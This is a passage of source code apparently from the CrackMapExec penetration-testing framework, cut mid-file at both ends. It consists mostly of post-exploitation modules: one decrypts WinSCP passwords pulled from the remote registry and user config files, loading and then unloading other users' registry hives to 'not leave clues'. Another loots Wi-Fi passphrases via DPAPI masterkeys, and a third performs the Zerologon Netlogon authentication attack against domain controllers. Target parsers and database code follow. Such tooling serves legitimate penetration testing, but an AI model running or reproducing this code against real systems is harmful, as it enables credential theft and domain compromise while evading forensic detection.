rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)\n regHandle = ans[\"phKey\"]\n\n for userObject in allUserObjects:\n ans = rrp.hBaseRegOpenKey(\n remoteOps._RemoteOperations__rrp,\n regHandle,\n \"SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\ProfileList\\\\\" + userObject,\n )\n keyHandle = ans[\"phkResult\"]\n\n userProfilePath = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, \"ProfileImagePath\")[1].split(\"\\x00\")[:-1][0]\n rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle)\n self.userDict[userObject] = userProfilePath.split(\"\\\\\")[-1]\n finally:\n remoteOps.finish()\n\n # ==================== Decrypt Password ====================\n def decryptPasswd(self, host: str, username: str, password: str) -> str:\n key = username + host\n\n # transform password to bytes\n passBytes = []\n for i in range(len(password)):\n val = int(password[i], 16)\n passBytes.append(val)\n\n pwFlag, passBytes = self.dec_next_char(passBytes)\n pwLength = 0\n\n # extract password length and trim the passbytes\n if pwFlag == self.PW_FLAG:\n _, passBytes = self.dec_next_char(passBytes)\n pwLength, passBytes = self.dec_next_char(passBytes)\n else:\n pwLength = pwFlag\n to_be_deleted, passBytes = self.dec_next_char(passBytes)\n passBytes = passBytes[to_be_deleted * 2 :]\n\n # decrypt the password\n clearpass = \"\"\n for i in range(pwLength):\n val, passBytes = self.dec_next_char(passBytes)\n clearpass += chr(val)\n if pwFlag == self.PW_FLAG:\n clearpass = clearpass[len(key) :]\n return clearpass\n\n def dec_next_char(self, passBytes) -> \"Tuple[int, bytes]\":\n \"\"\"\n Decrypts the first byte of the password and returns the decrypted byte and the remaining bytes.\n Parameters\n ----------\n passBytes : bytes\n The password bytes\n \"\"\"\n if not passBytes:\n return 0, passBytes\n a = passBytes[0]\n b = passBytes[1]\n passBytes = passBytes[2:]\n return ~(((a << 4) + b) ^ self.PW_MAGIC) & 0xFF, passBytes\n\n # ==================== Handle Registry ====================\n def registrySessionExtractor(self, context, connection, userObject, sessionName):\n \"\"\"\n Extract Session information from registry\n \"\"\"\n try:\n remoteOps = RemoteOperations(connection.conn, False)\n remoteOps.enableRegistry()\n\n ans = rrp.hOpenUsers(remoteOps._RemoteOperations__rrp)\n regHandle = ans[\"phKey\"]\n\n ans = rrp.hBaseRegOpenKey(\n remoteOps._RemoteOperations__rrp,\n regHandle,\n userObject + \"\\\\Software\\\\Martin Prikryl\\\\WinSCP 2\\\\Sessions\\\\\" + sessionName,\n )\n keyHandle = ans[\"phkResult\"]\n\n hostName = unquote(rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, \"HostName\")[1].split(\"\\x00\")[:-1][0])\n userName = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, \"UserName\")[1].split(\"\\x00\")[:-1][0]\n try:\n password = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, \"Password\")[1].split(\"\\x00\")[:-1][0]\n except:\n context.log.debug(\"Session found but no Password is stored!\")\n password = \"\"\n\n rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle)\n\n if password:\n decPassword = self.decryptPasswd(hostName, userName, password)\n else:\n decPassword = \"NO_PASSWORD_FOUND\"\n sectionName = unquote(sessionName)\n return [sectionName, hostName, userName, decPassword]\n except Exception as e:\n context.log.fail(f\"Error in Session Extraction: {e}\")\n context.log.debug(traceback.format_exc())\n finally:\n remoteOps.finish()\n return \"ERROR IN SESSION EXTRACTION\"\n\n def findAllLoggedInUsersInRegistry(self, context, connection):\n \"\"\"\n Checks whether User already exist in registry and therefore are logged in\n \"\"\"\n userObjects = []\n\n try:\n remoteOps = RemoteOperations(connection.conn, False)\n remoteOps.enableRegistry()\n\n # Enumerate all logged in and loaded Users on System\n ans = rrp.hOpenUsers(remoteOps._RemoteOperations__rrp)\n regHandle = ans[\"phKey\"]\n\n ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, \"\")\n keyHandle = ans[\"phkResult\"]\n\n data = rrp.hBaseRegQueryInfoKey(remoteOps._RemoteOperations__rrp, keyHandle)\n users = data[\"lpcSubKeys\"]\n\n # Get User Names\n userNames = []\n for i in range(users):\n userNames.append(rrp.hBaseRegEnumKey(remoteOps._RemoteOperations__rrp, keyHandle, i)[\"lpNameOut\"].split(\"\\x00\")[:-1][0])\n rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle)\n\n # Filter legit users in regex\n userNames.remove(\".DEFAULT\")\n regex = re.compile(r\"^.*_Classes$\")\n userObjects = [i for i in userNames if not regex.match(i)]\n except Exception as e:\n context.log.fail(f\"Error handling Users in registry: {e}\")\n context.log.debug(traceback.format_exc())\n finally:\n remoteOps.finish()\n return userObjects\n\n def findAllUsers(self, context, connection):\n \"\"\"\n Find all User on the System in HKEY_LOCAL_MACHINE\n \"\"\"\n userObjects = []\n\n try:\n remoteOps = RemoteOperations(connection.conn, False)\n remoteOps.enableRegistry()\n\n # Enumerate all Users on System\n ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)\n regHandle = ans[\"phKey\"]\n\n ans = rrp.hBaseRegOpenKey(\n remoteOps._RemoteOperations__rrp,\n regHandle,\n \"SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\ProfileList\",\n )\n keyHandle = ans[\"phkResult\"]\n\n data = rrp.hBaseRegQueryInfoKey(remoteOps._RemoteOperations__rrp, keyHandle)\n users = data[\"lpcSubKeys\"]\n\n # Get User Names\n for i in range(users):\n userObjects.append(rrp.hBaseRegEnumKey(remoteOps._RemoteOperations__rrp, keyHandle, i)[\"lpNameOut\"].split(\"\\x00\")[:-1][0])\n rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle)\n except Exception as e:\n context.log.fail(f\"Error handling Users in registry: {e}\")\n context.log.debug(traceback.format_exc())\n finally:\n remoteOps.finish()\n return userObjects\n\n def loadMissingUsers(self, context, connection, unloadedUserObjects):\n \"\"\"\n Extract Information for not logged in Users and then loads them into registry.\n \"\"\"\n try:\n remoteOps = RemoteOperations(connection.conn, False)\n remoteOps.enableRegistry()\n\n for userObject in unloadedUserObjects:\n # Extract profile Path of NTUSER.DAT\n ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)\n regHandle = ans[\"phKey\"]\n\n ans = rrp.hBaseRegOpenKey(\n remoteOps._RemoteOperations__rrp,\n regHandle,\n \"SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\ProfileList\\\\\" + userObject,\n )\n keyHandle = ans[\"phkResult\"]\n\n userProfilePath = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, \"ProfileImagePath\")[1].split(\"\\x00\")[:-1][0]\n rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle)\n\n # Load Profile\n ans = rrp.hOpenUsers(remoteOps._RemoteOperations__rrp)\n regHandle = ans[\"phKey\"]\n\n ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, \"\")\n keyHandle = ans[\"phkResult\"]\n\n context.log.debug(\"LOAD USER INTO REGISTRY: \" + userObject)\n rrp.hBaseRegLoadKey(\n remoteOps._RemoteOperations__rrp,\n keyHandle,\n userObject,\n userProfilePath + \"\\\\\" + \"NTUSER.DAT\",\n )\n rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle)\n finally:\n remoteOps.finish()\n\n def unloadMissingUsers(self, context, connection, unloadedUserObjects):\n \"\"\"\n If some User were not logged in at the beginning we unload them from registry. Don't leave clues behind...\n \"\"\"\n try:\n remoteOps = RemoteOperations(connection.conn, False)\n remoteOps.enableRegistry()\n\n # Unload Profile\n ans = rrp.hOpenUsers(remoteOps._RemoteOperations__rrp)\n regHandle = ans[\"phKey\"]\n\n ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, \"\")\n keyHandle = ans[\"phkResult\"]\n\n for userObject in unloadedUserObjects:\n context.log.debug(\"UNLOAD USER FROM REGISTRY: \" + userObject)\n try:\n rrp.hBaseRegUnLoadKey(remoteOps._RemoteOperations__rrp, keyHandle, userObject)\n except Exception as e:\n context.log.fail(f\"Error unloading user {userObject} in registry: {e}\")\n context.log.debug(traceback.format_exc())\n rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle)\n finally:\n remoteOps.finish()\n\n def checkMasterpasswordSet(self, connection, userObject):\n try:\n remoteOps = RemoteOperations(connection.conn, False)\n remoteOps.enableRegistry()\n\n ans = rrp.hOpenUsers(remoteOps._RemoteOperations__rrp)\n regHandle = ans[\"phKey\"]\n\n ans = rrp.hBaseRegOpenKey(\n remoteOps._RemoteOperations__rrp,\n regHandle,\n userObject + \"\\\\Software\\\\Martin Prikryl\\\\WinSCP 2\\\\Configuration\\\\Security\",\n )\n keyHandle = ans[\"phkResult\"]\n\n useMasterPassword = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, \"UseMasterPassword\")[1]\n rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle)\n finally:\n remoteOps.finish()\n return useMasterPassword\n\n def registryDiscover(self, context, connection):\n context.log.display(\"Looking for WinSCP creds in Registry...\")\n try:\n remoteOps = RemoteOperations(connection.conn, False)\n remoteOps.enableRegistry()\n\n # Enumerate all Users on System\n userObjects = self.findAllLoggedInUsersInRegistry(context, connection)\n allUserObjects = self.findAllUsers(context, connection)\n self.userObjectToNameMapper(context, connection, allUserObjects)\n\n # Users which must be loaded into registry:\n unloadedUserObjects = list(set(userObjects).symmetric_difference(set(allUserObjects)))\n self.loadMissingUsers(context, connection, unloadedUserObjects)\n\n # Retrieve how many sessions are stored in registry from each UserObject\n ans = rrp.hOpenUsers(remoteOps._RemoteOperations__rrp)\n regHandle = ans[\"phKey\"]\n for userObject in allUserObjects:\n try:\n ans = rrp.hBaseRegOpenKey(\n remoteOps._RemoteOperations__rrp,\n regHandle,\n userObject + \"\\\\Software\\\\Martin Prikryl\\\\WinSCP 2\\\\Sessions\",\n )\n keyHandle = ans[\"phkResult\"]\n\n data = rrp.hBaseRegQueryInfoKey(remoteOps._RemoteOperations__rrp, keyHandle)\n sessions = data[\"lpcSubKeys\"]\n context.log.success('Found {} sessions for user \"{}\" in registry!'.format(sessions - 1, self.userDict[userObject]))\n\n # Get Session Names\n sessionNames = []\n for i in range(sessions):\n sessionNames.append(rrp.hBaseRegEnumKey(remoteOps._RemoteOperations__rrp, keyHandle, i)[\"lpNameOut\"].split(\"\\x00\")[:-1][0])\n rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle)\n sessionNames.remove(\"Default%20Settings\")\n\n if self.checkMasterpasswordSet(connection, userObject):\n context.log.fail(\"MasterPassword set! Aborting extraction...\")\n continue\n # Extract stored Session infos\n for sessionName in sessionNames:\n self.printCreds(\n context,\n self.registrySessionExtractor(context, connection, userObject, sessionName),\n )\n except DCERPCException as e:\n if str(e).find(\"ERROR_FILE_NOT_FOUND\"):\n context.log.debug(\"No WinSCP config found in registry for user {}\".format(userObject))\n except Exception as e:\n context.log.fail(f\"Unexpected error: {e}\")\n context.log.debug(traceback.format_exc())\n self.unloadMissingUsers(context, connection, unloadedUserObjects)\n except DCERPCException as e:\n # Error during registry query\n if str(e).find(\"rpc_s_access_denied\"):\n context.log.fail(\"Error: rpc_s_access_denied. Seems like you don't have enough privileges to read the registry.\")\n except Exception as e:\n context.log.fail(f\"UNEXPECTED ERROR: {e}\")\n context.log.debug(traceback.format_exc())\n finally:\n remoteOps.finish()\n\n # ==================== Handle Configs ====================\n def decodeConfigFile(self, context, confFile):\n config = configparser.RawConfigParser(strict=False)\n config.read_string(confFile)\n\n # Stop extracting creds if Master Password is set\n if int(config.get(\"Configuration\\\\Security\", \"UseMasterPassword\")) == 1:\n context.log.fail(\"Master Password Set, unable to recover saved passwords!\")\n return\n\n for section in config.sections():\n if config.has_option(section, \"HostName\"):\n hostName = unquote(config.get(section, \"HostName\"))\n userName = config.get(section, \"UserName\")\n if config.has_option(section, \"Password\"):\n encPassword = config.get(section, \"Password\")\n decPassword = self.decryptPasswd(hostName, userName, encPassword)\n else:\n decPassword = \"NO_PASSWORD_FOUND\"\n sectionName = unquote(section)\n self.printCreds(context, [sectionName, hostName, userName, decPassword])\n\n def getConfigFile(self, context, connection):\n if self.filepath:\n self.share = self.filepath.split(\":\")[0] + \"$\"\n path = self.filepath.split(\":\")[1]\n\n try:\n buf = BytesIO()\n connection.conn.getFile(self.share, path, buf.write)\n confFile = buf.getvalue().decode()\n context.log.success(\"Found config file! Extracting credentials...\")\n self.decodeConfigFile(context, confFile)\n except:\n context.log.fail(\"Error! No config file found at {}\".format(self.filepath))\n context.log.debug(traceback.format_exc())\n else:\n context.log.display(\"Looking for WinSCP creds in User documents and AppData...\")\n output = connection.execute('powershell.exe \"Get-LocalUser | Select name\"', True)\n users = []\n for row in output.split(\"\\r\\n\"):\n users.append(row.strip())\n users = users[2:]\n\n # Iterate over found users and default paths to look for WinSCP.ini files\n for user in users:\n paths = [\n (\"\\\\Users\\\\\" + user + \"\\\\Documents\\\\WinSCP.ini\"),\n (\"\\\\Users\\\\\" + user + \"\\\\AppData\\\\Roaming\\\\WinSCP.ini\"),\n ]\n for path in paths:\n confFile = \"\"\n try:\n buf = BytesIO()\n connection.conn.getFile(self.share, path, buf.write)\n confFile = buf.getvalue().decode()\n context.log.success('Found config file at \"{}\"! Extracting credentials...'.format(self.share + path))\n except:\n context.log.debug('No config file found at \"{}\"'.format(self.share + path))\n if confFile:\n self.decodeConfigFile(context, confFile)\n\n def on_admin_login(self, context, connection):\n if not self.filepath:\n self.registryDiscover(context, connection)\n self.getConfigFile(context, connection)\n" }, { "path": "cme/modules/wireless.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom dploot.triage.masterkeys import MasterkeysTriage\nfrom dploot.lib.target import Target\nfrom dploot.lib.smb import DPLootSMBConnection\nfrom dploot.triage.wifi import WifiTriage\n\nfrom cme.helpers.logger import highlight\n\n\nclass CMEModule:\n name = \"wifi\"\n description = \"Get key of all wireless interfaces\"\n supported_protocols = [\"smb\"]\n opsec_safe = True\n multiple_hosts = True\n\n def options(self, context, module_options):\n \"\"\" \"\"\"\n\n def on_admin_login(self, context, connection):\n host = connection.hostname + \".\" + connection.domain\n domain = connection.domain\n username = connection.username\n kerberos = connection.kerberos\n aesKey = connection.aesKey\n use_kcache = getattr(connection, \"use_kcache\", False)\n password = getattr(connection, \"password\", \"\")\n lmhash = getattr(connection, \"lmhash\", \"\")\n nthash = getattr(connection, \"nthash\", \"\")\n\n target = Target.create(\n domain=domain,\n username=username,\n password=password,\n target=host,\n lmhash=lmhash,\n nthash=nthash,\n do_kerberos=kerberos,\n aesKey=aesKey,\n no_pass=True,\n use_kcache=use_kcache,\n )\n\n conn = None\n\n try:\n conn = DPLootSMBConnection(target)\n conn.smb_session = connection.conn\n except Exception as e:\n context.log.debug(\"Could not upgrade connection: {}\".format(e))\n return\n\n masterkeys = []\n try:\n masterkeys_triage = MasterkeysTriage(target=target, conn=conn)\n masterkeys += masterkeys_triage.triage_system_masterkeys()\n except Exception as e:\n context.log.debug(\"Could not get masterkeys: {}\".format(e))\n\n if len(masterkeys) == 0:\n context.log.fail(\"No masterkeys looted\")\n return\n\n context.log.success(\"Got {} decrypted masterkeys. Looting Wifi interfaces\".format(highlight(len(masterkeys))))\n\n try:\n # Collect Chrome Based Browser stored secrets\n wifi_triage = WifiTriage(target=target, conn=conn, masterkeys=masterkeys)\n wifi_creds = wifi_triage.triage_wifi()\n except Exception as e:\n context.log.debug(\"Error while looting wifi: {}\".format(e))\n for wifi_cred in wifi_creds:\n if wifi_cred.auth.upper() == \"OPEN\":\n context.log.highlight(\"[OPEN] %s\" % (wifi_cred.ssid))\n elif wifi_cred.auth.upper() in [\"WPAPSK\", \"WPA2PSK\", \"WPA3SAE\"]:\n try:\n context.log.highlight(\n \"[%s] %s - Passphrase: %s\"\n % (\n wifi_cred.auth.upper(),\n wifi_cred.ssid,\n wifi_cred.password.decode(\"latin-1\"),\n )\n )\n except:\n context.log.highlight(\"[%s] %s - Passphrase: %s\" % (wifi_cred.auth.upper(), wifi_cred.ssid, wifi_cred.password))\n elif wifi_cred.auth.upper() in ['WPA', 'WPA2']:\n try:\n if self.eap_username is not None and self.eap_password is not None:\n context.log.highlight(\n \"[%s] %s - %s - Identifier: %s:%s\"\n % (\n wifi_cred.auth.upper(),\n wifi_cred.ssid,\n wifi_cred.eap_type,\n wifi_cred.eap_username,\n wifi_cred.eap_password,\n )\n )\n else:\n context.log.highlight(\n \"[%s] %s - %s \"\n % (\n wifi_cred.auth.upper(),\n wifi_cred.ssid,\n wifi_cred.eap_type,\n )\n )\n except:\n context.log.highlight(\"[%s] %s - Passphrase: %s\" % (wifi_cred.auth.upper(), wifi_cred.ssid, wifi_cred.password))\n else:\n context.log.highlight(\"[WPA-EAP] %s - %s\" % (wifi_cred.ssid, wifi_cred.eap_type))\n" }, { "path": "cme/modules/zerologon.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# everything is comming from https://github.com/dirkjanm/CVE-2020-1472\n# credit to @dirkjanm\n# module by : @mpgn_x64\nfrom impacket.dcerpc.v5 import nrpc, epm, transport\nfrom impacket.dcerpc.v5.rpcrt import DCERPCException\nimport sys\nfrom cme.logger import cme_logger\n\n# Give up brute-forcing after this many attempts. If vulnerable, 256 attempts are expected to be necessary on average.\nMAX_ATTEMPTS = 2000 # False negative chance: 0.04%\n\n\nclass CMEModule:\n name = \"zerologon\"\n description = \"Module to check if the DC is vulnerable to Zerologon aka CVE-2020-1472\"\n supported_protocols = [\"smb\", \"wmi\"]\n opsec_safe = True\n multiple_hosts = False\n\n def __init__(self, context=None, module_options=None):\n self.context = context\n self.module_options = module_options\n\n def options(self, context, module_options):\n \"\"\"\"\"\"\n\n def on_login(self, context, connection):\n self.context = context\n if self.perform_attack(\"\\\\\\\\\" + connection.hostname, connection.host, connection.hostname):\n self.context.log.highlight(\"VULNERABLE\")\n self.context.log.highlight(\"Next step: https://github.com/dirkjanm/CVE-2020-1472\")\n try:\n host = self.context.db.get_hosts(connection.host)[0]\n self.context.db.add_host(\n host.ip,\n host.hostname,\n host.domain,\n host.os,\n host.smbv1,\n host.signing,\n zerologon=True,\n )\n except Exception as e:\n self.context.log.debug(f\"Error updating zerologon status in database\")\n\n def perform_attack(self, dc_handle, dc_ip, target_computer):\n # Keep authenticating until successful. Expected average number of attempts needed: 256.\n self.context.log.debug(\"Performing authentication attempts...\")\n rpc_con = None\n try:\n binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol=\"ncacn_ip_tcp\")\n rpc_con = transport.DCERPCTransportFactory(binding).get_dce_rpc()\n rpc_con.connect()\n rpc_con.bind(nrpc.MSRPC_UUID_NRPC)\n for attempt in range(0, MAX_ATTEMPTS):\n result = try_zero_authenticate(rpc_con, dc_handle, dc_ip, target_computer)\n if result:\n return True\n else:\n self.context.log.highlight(\"Attack failed. Target is probably patched.\")\n except DCERPCException as e:\n self.context.log.fail(f\"Error while connecting to host: DCERPCException, \" f\"which means this is probably not a DC!\")\n\ndef fail(msg):\n cme_logger.debug(msg)\n cme_logger.fail(\"This might have been caused by invalid arguments or network issues.\")\n sys.exit(2)\n\ndef try_zero_authenticate(rpc_con, dc_handle, dc_ip, target_computer):\n # Connect to the DC's Netlogon service.\n\n # Use an all-zero challenge and credential.\n plaintext = b\"\\x00\" * 8\n ciphertext = b\"\\x00\" * 8\n\n # Standard flags observed from a Windows 10 client (including AES), with only the sign/seal flag disabled.\n flags = 0x212FFFFF\n\n # Send challenge and authentication request.\n nrpc.hNetrServerReqChallenge(rpc_con, dc_handle + \"\\x00\", target_computer + \"\\x00\", plaintext)\n try:\n server_auth = nrpc.hNetrServerAuthenticate3(\n rpc_con,\n dc_handle + \"\\x00\",\n target_computer + \"$\\x00\",\n nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,\n target_computer + \"\\x00\",\n ciphertext,\n flags,\n )\n\n # It worked!\n assert server_auth[\"ErrorCode\"] == 0\n return True\n\n except nrpc.DCERPCSessionError as ex:\n # Failure should be due to a STATUS_ACCESS_DENIED error. Otherwise, the attack is probably not working.\n if ex.get_error_code() == 0xC0000022:\n return None\n else:\n fail(f\"Unexpected error code from DC: {ex.get_error_code()}.\")\n except BaseException as ex:\n fail(f\"Unexpected error: {ex}.\")\n" }, { "path": "cme/parsers/__init__.py", "content": "" }, { "path": "cme/parsers/ip.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom ipaddress import ip_address, ip_network, summarize_address_range, ip_interface\n\n\ndef parse_targets(target):\n try:\n if \"-\" in target:\n start_ip, end_ip = target.split(\"-\")\n try:\n end_ip = ip_address(end_ip)\n except ValueError:\n first_three_octets = start_ip.split(\".\")[:-1]\n first_three_octets.append(end_ip)\n end_ip = ip_address(\".\".join(first_three_octets))\n\n for ip_range in summarize_address_range(ip_address(start_ip), end_ip):\n for ip in ip_range:\n yield str(ip)\n else:\n if ip_interface(target).ip.version == 6 and ip_address(target).is_link_local:\n yield str(target)\n else:\n for ip in ip_network(target, strict=False):\n yield str(ip)\n except ValueError as e:\n yield str(target)\n" }, { "path": "cme/parsers/nessus.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport xmltodict\n\n# Ideally i'd like to be able to pull this info out dynamically from each protocol object but i'm a lazy bastard\nprotocol_dict = {\n \"smb\": {\"ports\": [445, 139], \"services\": [\"smb\", \"cifs\"]},\n \"mssql\": {\"ports\": [1433], \"services\": [\"mssql\"]},\n \"ssh\": {\"ports\": [22], \"services\": [\"ssh\"]},\n \"winrm\": {\"ports\": [5986, 5985], \"services\": [\"www\", \"https?\"]},\n \"http\": {\"ports\": [80, 443, 8443, 8008, 8080, 8081], \"services\": [\"www\", \"https?\"]},\n}\n\n\ndef parse_nessus_file(nessus_file, protocol):\n targets = []\n\n def handle_nessus_file(path, item):\n # Must return True otherwise xmltodict will throw a ParsingIterrupted() exception\n # https://github.com/martinblech/xmltodict/blob/master/xmltodict.py#L219\n\n if any(\"ReportHost\" and \"ReportItem\" in values for values in path):\n item = dict(path)\n ip = item[\"ReportHost\"][\"name\"]\n if ip in targets:\n return True\n\n port = item[\"ReportItem\"][\"port\"]\n svc_name = item[\"ReportItem\"][\"svc_name\"]\n\n if port in protocol_dict[protocol][\"ports\"]:\n targets.append(ip)\n if svc_name in protocol_dict[protocol][\"services\"]:\n targets.append(ip)\n\n return True\n else:\n return True\n\n with open(nessus_file, \"r\") as file_handle:\n xmltodict.parse(file_handle, item_depth=4, item_callback=handle_nessus_file)\n\n return targets\n" }, { "path": "cme/parsers/nmap.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom libnmap.parser import NmapParser\nfrom cme.logger import cme_logger\n\n# right now we are only referencing the port numbers, not the service name, but this should be sufficient for 99% cases\nprotocol_dict = {\n \"ftp\": {\n \"ports\": [21],\n \"services\": [\"ftp\"]\n },\n \"ssh\": {\n \"ports\": [22, 2222],\n \"services\": [\"ssh\"]\n },\n \"smb\": {\n \"ports\": [139, 445],\n \"services\": [\"netbios-ssn\", \"microsoft-ds\"]\n },\n \"ldap\": {\n \"ports\": [389, 636],\n \"services\": [\"ldap\", \"ldaps\"]\n },\n \"mssql\": {\n \"ports\": [1433],\n \"services\": [\"ms-sql-s\"]\n },\n \"rdp\": {\n \"ports\": [3389],\n \"services\": [\"ms-wbt-server\"]\n },\n \"winrm\": {\n \"ports\": [5985, 5986],\n \"services\": [\"wsman\"]\n },\n \"vnc\": {\n \"ports\": [5900, 5901, 5902, 5903, 5904, 5905, 5906],\n \"services\": [\"vnc\"]\n },\n}\n\n\ndef parse_nmap_xml(nmap_output_file, protocol):\n nmap_report = NmapParser.parse_fromfile(nmap_output_file)\n targets = []\n\n for host in nmap_report.hosts:\n for port, proto in host.get_open_ports():\n if port in protocol_dict[protocol][\"ports\"]:\n targets.append(host.ipv4)\n break\n cme_logger.debug(f\"Targets parsed from Nmap scan: {targets}\")\n\n return targets\n" }, { "path": "cme/paths.py", "content": "import os\nimport sys\nimport cme\n\nCME_PATH = os.path.expanduser(\"~/.cme\")\nTMP_PATH = os.path.join(\"/tmp\", \"cme_hosted\")\nif os.name == \"nt\":\n TMP_PATH = os.getenv(\"LOCALAPPDATA\") + \"\\\\Temp\\\\cme_hosted\"\nif hasattr(sys, \"getandroidapilevel\"):\n TMP_PATH = os.path.join(\"/data\", \"data\", \"com.termux\", \"files\", \"usr\", \"tmp\", \"cme_hosted\")\nWS_PATH = os.path.join(CME_PATH, \"workspaces\")\nCERT_PATH = os.path.join(CME_PATH, \"cme.pem\")\nCONFIG_PATH = os.path.join(CME_PATH, \"cme.conf\")\nWORKSPACE_DIR = os.path.join(CME_PATH, \"workspaces\")\nDATA_PATH = os.path.join(os.path.dirname(cme.__file__), \"data\")\n" }, { "path": "cme/protocols/__init__.py", "content": "" }, { "path": "cme/protocols/ftp/__init__.py", "content": "" }, { "path": "cme/protocols/ftp/database.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom pathlib import Path\nfrom sqlalchemy.dialects.sqlite import Insert\nfrom sqlalchemy.orm import sessionmaker, scoped_session\nfrom sqlalchemy import MetaData, Table, select, delete, func\nfrom sqlalchemy.exc import (\n IllegalStateChangeError,\n NoInspectionAvailable,\n NoSuchTableError,\n)\nfrom cme.logger import cme_logger\n\n\nclass database:\n def __init__(self, db_engine):\n self.CredentialsTable = None\n self.HostsTable = None\n self.LoggedinRelationsTable = None\n\n self.db_engine = db_engine\n self.db_path = self.db_engine.url.database\n self.protocol = Path(self.db_path).stem.upper()\n self.metadata = MetaData()\n self.reflect_tables()\n\n session_factory = sessionmaker(bind=self.db_engine, expire_on_commit=True)\n Session = scoped_session(session_factory)\n self.sess = Session()\n\n @staticmethod\n def db_schema(db_conn):\n db_conn.execute(\"\"\"CREATE TABLE \"credentials\" (\n \"id\" integer PRIMARY KEY,\n \"username\" text,\n \"password\" text\n )\"\"\")\n\n db_conn.execute(\"\"\"CREATE TABLE \"hosts\" (\n \"id\" integer PRIMARY KEY,\n \"host\" text,\n \"port\" integer,\n \"banner\" text\n )\"\"\")\n db_conn.execute(\"\"\"CREATE TABLE \"loggedin_relations\" (\n \"id\" integer PRIMARY KEY,\n \"credid\" integer,\n \"hostid\" integer,\n FOREIGN KEY(credid) REFERENCES credentials(id),\n FOREIGN KEY(hostid) REFERENCES hosts(id)\n )\"\"\")\n db_conn.execute(\"\"\"CREATE TABLE \"directory_listings\" (\n \"id\" integer PRIMARY KEY,\n \"lir_id\" integer,\n \"data\" text,\n FOREIGN KEY(lir_id) REFERENCES loggedin_relations(id)\n )\"\"\")\n\n def reflect_tables(self):\n with self.db_engine.connect():\n try:\n self.CredentialsTable = Table(\n \"credentials\", self.metadata, autoload_with=self.db_engine\n )\n self.HostsTable = Table(\n \"hosts\", self.metadata, autoload_with=self.db_engine\n )\n self.LoggedinRelationsTable = Table(\n \"loggedin_relations\", self.metadata, autoload_with=self.db_engine\n )\n self.DirectoryListingsTable = Table(\n \"directory_listings\", self.metadata, autoload_with=self.db_engine\n )\n except (NoInspectionAvailable, NoSuchTableError):\n print(\n f\"\"\"\n [-] Error reflecting tables for the {self.protocol} protocol - this means there is a DB schema mismatch\n [-] This is probably because a newer version of CME is being ran on an old DB schema\n [-] Optionally save the old DB data (`cp {self.db_path} ~/cme_{self.protocol.lower()}.bak`)\n [-] Then remove the {self.protocol} DB (`rm -f {self.db_path}`) and run CME to initialize the new DB\"\"\"\n )\n exit()\n\n def shutdown_db(self):\n try:\n self.sess.close()\n # due to the async nature of CME, sometimes session state is a bit messy and this will throw:\n # Method 'close()' can't be called here; method '_connection_for_bind()' is already in progress and\n # this would cause an unexpected state change to \n except IllegalStateChangeError as e:\n cme_logger.debug(f\"Error while closing session db object: {e}\")\n\n def clear_database(self):\n for table in self.metadata.sorted_tables:\n self.sess.execute(table.delete())\n\n def add_host(self, host, port, banner):\n \"\"\"\n Check if this host is already in the DB, if not add it\n \"\"\"\n hosts = []\n updated_ids = []\n\n q = select(self.HostsTable).filter(self.HostsTable.c.host == host)\n results = self.sess.execute(q).all()\n\n # create new host\n if not results:\n new_host = {\n \"host\": host,\n \"port\": port,\n \"banner\": banner,\n }\n hosts = [new_host]\n # update existing hosts data\n else:\n for host_result in results:\n host_data = host_result._asdict()\n cme_logger.debug(f\"host: {host_result}\")\n cme_logger.debug(f\"host_data: {host_data}\")\n # only update column if it is being passed in\n if host is not None:\n host_data[\"host\"] = host\n if port is not None:\n host_data[\"port\"] = port\n if banner is not None:\n host_data[\"banner\"] = banner\n # only add host to be updated if it has changed\n if host_data not in hosts:\n hosts.append(host_data)\n updated_ids.append(host_data[\"id\"])\n cme_logger.debug(f\"Hosts: {hosts}\")\n\n # TODO: find a way to abstract this away to a single Upsert call\n q = Insert(self.HostsTable) # .returning(self.HostsTable.c.id)\n update_columns = {col.name: col for col in q.excluded if col.name not in \"id\"}\n q = q.on_conflict_do_update(\n index_elements=self.HostsTable.primary_key,\n set_=update_columns\n )\n\n self.sess.execute(q, hosts) # .scalar()\n # we only return updated IDs for now - when RETURNING clause is allowed we can return inserted\n if updated_ids:\n cme_logger.debug(f\"add_host() - Host IDs Updated: {updated_ids}\")\n return updated_ids\n\n def add_credential(self, username, password):\n \"\"\"\n Check if this credential has already been added to the 